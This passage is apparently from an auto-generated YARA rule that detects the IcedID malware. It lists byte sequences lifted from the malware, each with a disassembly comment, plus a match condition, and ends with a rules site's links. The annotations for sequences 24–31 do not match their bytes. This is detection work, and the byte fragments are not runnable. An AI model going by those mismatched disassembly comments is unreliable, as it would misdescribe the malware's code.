            //   d1c8                 | ror                 eax, 1
            //   2d20010000           | sub                 eax, 0x120
            //   d1c0                 | rol                 eax, 1
            //   f7d0                 | not                 eax
            //   2d01910000           | sub                 eax, 0x9101

        $sequence_6 = { ff773c 51 51 ff15???????? }
            // n = 4, score = 1300
            //   ff773c               | push                dword ptr [edi + 0x3c]
            //   51                   | push                ecx
            //   51                   | push                ecx
            //   ff15????????         |                     

        $sequence_7 = { 50 7413 ff36 6a08 ff15???????? }
            // n = 5, score = 1300
            //   50                   | push                eax
            //   7413                 | je                  0x15
            //   ff36                 | push                dword ptr [esi]
            //   6a08                 | push                8
            //   ff15????????         |                     

        $sequence_8 = { ff15???????? 8bf7 8bc6 eb02 33c0 }
            // n = 5, score = 1300
            //   ff15????????         |                     
            //   8bf7                 | mov                 esi, edi
            //   8bc6                 | mov                 eax, esi
            //   eb02                 | jmp                 4
            //   33c0                 | xor                 eax, eax

        $sequence_9 = { c1c90d 0fbec0 03c8 46 8a06 }
            // n = 5, score = 1200
            //   c1c90d               | ror                 ecx, 0xd
            //   0fbec0               | movsx               eax, al
            //   03c8                 | add                 ecx, eax
            //   46                   | inc                 esi
            //   8a06                 | mov                 al, byte ptr [esi]

        $sequence_10 = { 8be5 5d c3 8b542404 33c9 }
            // n = 5, score = 1000
            //   8be5                 | mov                 esp, ebp
            //   5d                   | pop                 ebp
            //   c3                   | ret                 
            //   8b542404             | mov                 edx, dword ptr [esp + 4]
            //   33c9                 | xor                 ecx, ecx

        $sequence_11 = { 8bf0 8d45fc 50 ff75fc 6a05 }
            // n = 5, score = 1000
            //   8bf0                 | mov                 esi, eax
            //   8d45fc               | lea                 eax, [ebp - 4]
            //   50                   | push                eax
            //   ff75fc               | push                dword ptr [ebp - 4]
            //   6a05                 | push                5

        $sequence_12 = { 47 3b7820 72d1 5b 33c0 40 5f }
            // n = 7, score = 800
            //   47                   | inc                 edi
            //   3b7820               | cmp                 edi, dword ptr [eax + 0x20]
            //   72d1                 | jb                  0xffffffd3
            //   5b                   | pop                 ebx
            //   33c0                 | xor                 eax, eax
            //   40                   | inc                 eax
            //   5f                   | pop                 edi

        $sequence_13 = { eb5c 8d5004 89542414 8b12 85d2 }
            // n = 5, score = 800
            //   eb5c                 | jmp                 0x5e
            //   8d5004               | lea                 edx, [eax + 4]
            //   89542414             | mov                 dword ptr [esp + 0x14], edx
            //   8b12                 | mov                 edx, dword ptr [edx]
            //   85d2                 | test                edx, edx

        $sequence_14 = { 8d6af8 d1ed 6a00 5f 743f 8d5808 }
            // n = 6, score = 800
            //   8d6af8               | lea                 ebp, [edx - 8]
            //   d1ed                 | shr                 ebp, 1
            //   6a00                 | push                0
            //   5f                   | pop                 edi
            //   743f                 | je                  0x41
            //   8d5808               | lea                 ebx, [eax + 8]

        $sequence_15 = { 83c302 3bfd 72c4 8b542414 0302 }
            // n = 5, score = 800
            //   83c302               | add                 ebx, 2
            //   3bfd                 | cmp                 edi, ebp
            //   72c4                 | jb                  0xffffffc6
            //   8b542414             | mov                 edx, dword ptr [esp + 0x14]
            //   0302                 | add                 eax, dword ptr [edx]

        $sequence_16 = { ff5010 85c0 7407 33c0 }
            // n = 4, score = 400
            //   ff5010               | call                dword ptr [eax + 0x10]
            //   85c0                 | test                eax, eax
            //   7407                 | je                  9
            //   33c0                 | xor                 eax, eax

        $sequence_17 = { a808 75f5 a804 7406 }
            // n = 4, score = 400
            //   a808                 | test                al, 8
            //   75f5                 | jne                 0xfffffff7
            //   a804                 | test                al, 4
            //   7406                 | je                  8

        $sequence_18 = { ff15???????? 85c0 750a b8010000c0 }
            // n = 4, score = 400
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   750a                 | jne                 0xc
            //   b8010000c0           | mov                 eax, 0xc0000001

        $sequence_19 = { 48 8364244000 48 8d4510 }
            // n = 4, score = 200
            //   48                   | dec                 eax
            //   8364244000           | and                 dword ptr [esp + 0x40], 0
            //   48                   | dec                 eax
            //   8d4510               | lea                 eax, [ebp + 0x10]

        $sequence_20 = { 668905???????? e8???????? 0bd8 85db 7505 }
            // n = 5, score = 200
            //   668905????????       |                     
            //   e8????????           |                     
            //   0bd8                 | or                  ebx, eax
            //   85db                 | test                ebx, ebx
            //   7505                 | jne                 7

        $sequence_21 = { 48 8945e0 48 8bd8 48 85c0 }
            // n = 6, score = 200
            //   48                   | dec                 eax
            //   8945e0               | mov                 dword ptr [ebp - 0x20], eax
            //   48                   | dec                 eax
            //   8bd8                 | mov                 ebx, eax
            //   48                   | dec                 eax
            //   85c0                 | test                eax, eax

        $sequence_22 = { 85c0 7507 b806000000 eb11 8b442438 f7d8 1bc0 }
            // n = 7, score = 200
            //   85c0                 | test                eax, eax
            //   7507                 | jne                 9
            //   b806000000           | mov                 eax, 6
            //   eb11                 | jmp                 0x13
            //   8b442438             | mov                 eax, dword ptr [esp + 0x38]
            //   f7d8                 | neg                 eax
            //   1bc0                 | sbb                 eax, eax

        $sequence_23 = { 8bcf 41 ff506b 49 }
            // n = 4, score = 200
            //   8bcf                 | mov                 ecx, edi
            //   41                   | inc                 ecx
            //   ff506b               | call                dword ptr [eax + 0x6b]
            //   49                   | dec                 ecx

        $sequence_24 = { 4883ff04 0f8210010000 4883ef04 48897c2430 4885db 753d 4885ff }
            // n = 7, score = 100
            //   4883ff04             | mov                 ebx, dword ptr [esp + 0x28]
            //   0f8210010000         | dec                 esp
            //   4883ef04             | cmp                 ebx, dword ptr [esp + 0x30]
            //   48897c2430           | jae                 0x13
            //   4885db               | dec                 esp
            //   753d                 | mov                 esi, dword ptr [esp + 0x20]
            //   4885ff               | jmp                 0xffffffb4

        $sequence_25 = { 4289448440 488b5c2428 4c3b5c2430 7307 4c8b742420 eba1 488bb590020000 }
            // n = 7, score = 100
            //   4289448440           | add                 ecx, eax
            //   488b5c2428           | rol                 ecx, 3
            //   4c3b5c2430           | dec                 eax
            //   7307                 | cmp                 edx, edi
            //   4c8b742420           | jb                  0xfffffff7
            //   eba1                 | inc                 esp
            //   488bb590020000       | cmp                 ecx, ecx

        $sequence_26 = { 03c8 c1c103 483bd7 72ef 443bc9 7458 4585d2 }
            // n = 7, score = 100
            //   03c8                 | dec                 eax
            //   c1c103               | test                edi, edi
            //   483bd7               | je                  0xff
            //   72ef                 | dec                 eax
            //   443bc9               | mov                 ecx, eax
            //   7458                 | dec                 esp
            //   4585d2               | lea                 eax, [edi + 1]

        $sequence_27 = { e9???????? ff15???????? 33c0 eb05 b801000000 488b5c2440 }
            // n = 6, score = 100
            //   e9????????           |                     
            //   ff15????????         |                     
            //   33c0                 | xor                 eax, eax
            //   eb05                 | jmp                 7
            //   b801000000           | mov                 eax, 1
            //   488b5c2440           | dec                 eax

        $sequence_28 = { 4885ff 0f84f9000000 ff15???????? 488bc8 4c8d4701 }
            // n = 5, score = 100
            //   4885ff               | inc                 ebp
            //   0f84f9000000         | xor                 eax, eax
            //   ff15????????         |                     
            //   488bc8               | mov                 dword ptr [eax - 0x38], 3
            //   4c8d4701             | mov                 edx, 0x80000000

        $sequence_29 = { 4533c0 c740c803000000 ba00000080 ff15???????? }
            // n = 4, score = 100
            //   4533c0               | dec                 eax
            //   c740c803000000       | test                ebx, ebx
            //   ba00000080           | je                  0x1d
            //   ff15????????         |                     

        $sequence_30 = { 4585d2 7420 4885db 741b }
            // n = 4, score = 100
            //   4585d2               | mov                 ebx, dword ptr [esp + 0x40]
            //   7420                 | inc                 ebp
            //   4885db               | test                edx, edx
            //   741b                 | je                  0x22

        $sequence_31 = { 488bf2 488bd9 ff15???????? 4885c0 7504 33c0 eb7e }
            // n = 7, score = 100
            //   488bf2               | je                  0x65
            //   488bd9               | inc                 ebp
            //   ff15????????         |                     
            //   4885c0               | test                edx, edx
            //   7504                 | inc                 edx
            //   33c0                 | mov                 dword ptr [esp + eax*4 + 0x40], eax
            //   eb7e                 | dec                 eax

    condition:
        7 of them and filesize < 303104
}

Download all Yara Rules

IcedID Propose Change

References

Yara Rules

IcedID